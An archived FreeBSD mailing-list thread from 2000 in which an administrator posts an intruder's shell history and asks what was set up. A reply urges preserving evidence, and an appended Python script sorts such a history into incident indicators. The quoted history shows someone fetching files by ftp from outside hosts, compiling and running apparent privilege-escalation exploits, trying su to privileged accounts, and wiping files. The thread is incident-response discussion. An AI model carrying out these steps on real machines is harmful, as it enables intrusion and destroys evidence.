From owner-freebsd-questions Mon Dec 18 12:56:48 2000
From owner-freebsd-questions@FreeBSD.ORG Mon Dec 18 12:56:43 2000
Return-Path:
Delivered-To: freebsd-questions@freebsd.org
Received: from joe.pythonvideo.com (joe.pythonvideo.com [209.226.29.94]) by hub.freebsd.org (Postfix) with ESMTP id 9AB8437B402 for ; Mon, 18 Dec 2000 12:56:42 -0800 (PST)
Received: from localhost (joe@localhost) by joe.pythonvideo.com (8.11.1/8.11.0) with ESMTP id eBIKuR207052; Mon, 18 Dec 2000 15:56:27 -0500 (EST) (envelope-from joe@advancewebhosting.com)
X-Authentication-Warning: joe.pythonvideo.com: joe owned process doing -bs
Date: Mon, 18 Dec 2000 15:56:27 -0500 (EST)
From: Joe Oliveiro
X-Sender: joe@joe.pythonvideo.com
To: Alexander V P
Cc: "Gerald T. Freymann" , Questions
Subject: Re: Hacker history file - OUCH
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-questions@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

i like wiping the box!

Microsoft: "Where would you like to go to today"
Linux: "Where would you like to go tomorrow"
FreeBSD: "Hey, when are you guys going to catch up"

On Mon, 18 Dec 2000, Alexander V P wrote:

> hi,
> do you keep/have logs about what ftp transfers he did?
> did you send mail to root@he.net, or the .mx domain?
> any idea how he broke in? what freebsd are you using?
> if i were in your place, i'd unplug the box and try to find out more about
> this. don't do like most of the sysadmins that just wipe the box.
> alex
>
> On Mon, 18 Dec 2000, Gerald T. Freymann wrote:
>
> > Seems we have an intruder on one of our boxes... the .history file from the
> > troubled account follows:
> >
> > cd bnc
> > ls
> > ./bash
> > who
> > cd /etc
> > more passwd
> > ps -l
> > ls -l
> > more pwd.db
> > more hosts
> > pico adduser.conf.bak
> > pico group
> > su user
> > pico group.bak
> > pico ftpuser
> > O
> > pico ftpusers
> > su toor
> > su operator
> > id
> > pico spwd.db
> > su wheel
> > pico passwd
> > cd /var/tmp
> > ls -a
> > cd ...
> > ls -a
> > cd ..
> > ls -l
> > ls -al
> > cd ...
> > ftp copper.he.net
> > chmod u+x xcon
> > ./xcon
> > id
> > rm *
> > ls
> > who
> > cd /var/tmp
> > ls -a
> > ls -al
> > cd ...
> > ls -a
> > ftp cih.edu.mx
> > ls
> > cc bsd1 bsd-cron.c
> > cc -o bsd1 bsd-cron.c
> > ./bsd1
> > id
> > cc -o bsd2 bsd2.c
> > ./bsd2
> > id
> > ls
> > ftp cih.edu.mx
> > ./bsd sh
> > ./bsd.sh
> > chmod u+x bsd.sh
> > ./bsd.sh
> > /tmp/sh
> > id
> > ls
> > cc -o bsdsmail bsdsmail.c
> > ./bsdsmail
> > ls -a
> > pico hack
> > ls
> > pico user.inf
> > ls
> > id
> > rm *
> > exit
> >
> > Anybody recognize what the intruder has set up?
> >
> > -Gerry

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
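Alexander's point in the thread is to keep the evidence and work out what happened before wiping. As an added example, not part of the thread, here is a small Python triage of a .history file like Gerry's: it buckets lines into the indicators a responder wants first (hosts to report to, su to privileged accounts, binaries compiled or chmod'ed and then run, a following `id`, dot-named hidden directories, `rm *`). The sample input is a constructed subset of the quoted lines, and the bucket names are chosen here.

```python
import re
from collections import defaultdict
# Constructed sample: a subset of the .history lines quoted in the thread.
SAMPLE_HISTORY = """\
su toor
cd ...
ftp copper.he.net
chmod u+x xcon
./xcon
id
rm *
ftp cih.edu.mx
cc -o bsd1 bsd-cron.c
./bsd1
id
chmod u+x bsd.sh
./bsd.sh
/tmp/sh
id
rm *
"""
PRIV_ACCOUNTS = {"root", "toor", "operator", "wheel"}

def triage_history(text):
    """Bucket history lines into defender-relevant indicators (keys below)."""
    out = defaultdict(list)
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    chmodded = set()  # files made executable earlier in the session
    for i, line in enumerate(lines):
        argv = line.split()
        cmd = argv[0]
        if cmd == "ftp" and len(argv) > 1:        # hosts to contact / abuse-report
            out["remote_hosts"].append(argv[1])
        elif cmd == "su" and len(argv) > 1 and argv[1] in PRIV_ACCOUNTS:
            out["priv_su"].append(argv[1])        # su to a privileged account
        elif cmd == "cc" and "-o" in argv:
            out["compiled"].append(argv[argv.index("-o") + 1])  # built on-box
        elif cmd == "chmod" and len(argv) > 2:
            chmodded.add(argv[-1])
        elif cmd == "cd" and len(argv) > 1 and re.fullmatch(r"\.{3,}", argv[1]):
            out["hidden_dirs"].append(argv[1])    # '...'-style hidden directory
        elif cmd == "rm" and "*" in argv:
            out["wipes"].append(i + 1)            # evidence destruction (1-based line)
        elif cmd.startswith(("./", "/tmp/")):
            name = cmd.rsplit("/", 1)[-1]
            if name in chmodded:
                out["exec_after_chmod"].append(name)
            if i + 1 < len(lines) and lines[i + 1] == "id":
                out["id_after_exec"].append(cmd)  # ran something, then checked uid
    return dict(out)
```

The `remote_hosts` bucket gives the contacts Alexander asks about, and `id_after_exec` lists the binaries whose effect on privileges the intruder checked, which is where a responder would start looking for the escalation path.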